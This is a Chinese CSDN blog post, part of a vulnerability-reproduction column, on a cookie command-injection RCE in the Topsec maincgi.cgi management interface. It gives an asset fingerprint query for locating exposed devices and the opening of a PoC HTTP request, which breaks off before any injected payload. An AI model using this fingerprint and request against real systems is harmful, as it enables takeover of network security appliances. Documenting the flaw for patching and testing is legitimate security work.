天融信TOPSEC_maincgi.cgi远程命令执行

最新推荐文章于 2024-06-03 10:51:30 发布

今天晚上早睡觉

最新推荐文章于 2024-06-03 10:51:30 发布

阅读量64

点赞数

分类专栏：漏洞复现文章标签： web安全

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136590352

版权

漏洞复现专栏收录该内容

365 篇文章 169 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了天融信TOPSEC解决方案中的一个安全问题，具体为综合管理系统CGI组件`maincgi.cgi`存在的远程命令执行漏洞。攻击者可以利用此漏洞通过特定的Cookie注入命令，导致服务器被控制。资产信息包括title为'Web User Login'的页面，存在漏洞的URL为'/cgi/maincgi.cgi?Url=VerifyCode'。官方已发布修复方案，推荐用户升级到最新版本以消除安全隐患。

摘要由CSDN通过智能技术生成

漏洞描述

天融信TOPSEC解决方案包括综合管理系统，各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie中存在命令注入漏洞，会导致服务器失陷。

资产

title=”Web User Login” && body=”/cgi/maincgi.cgi?Url=VerifyCode”

POC

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insec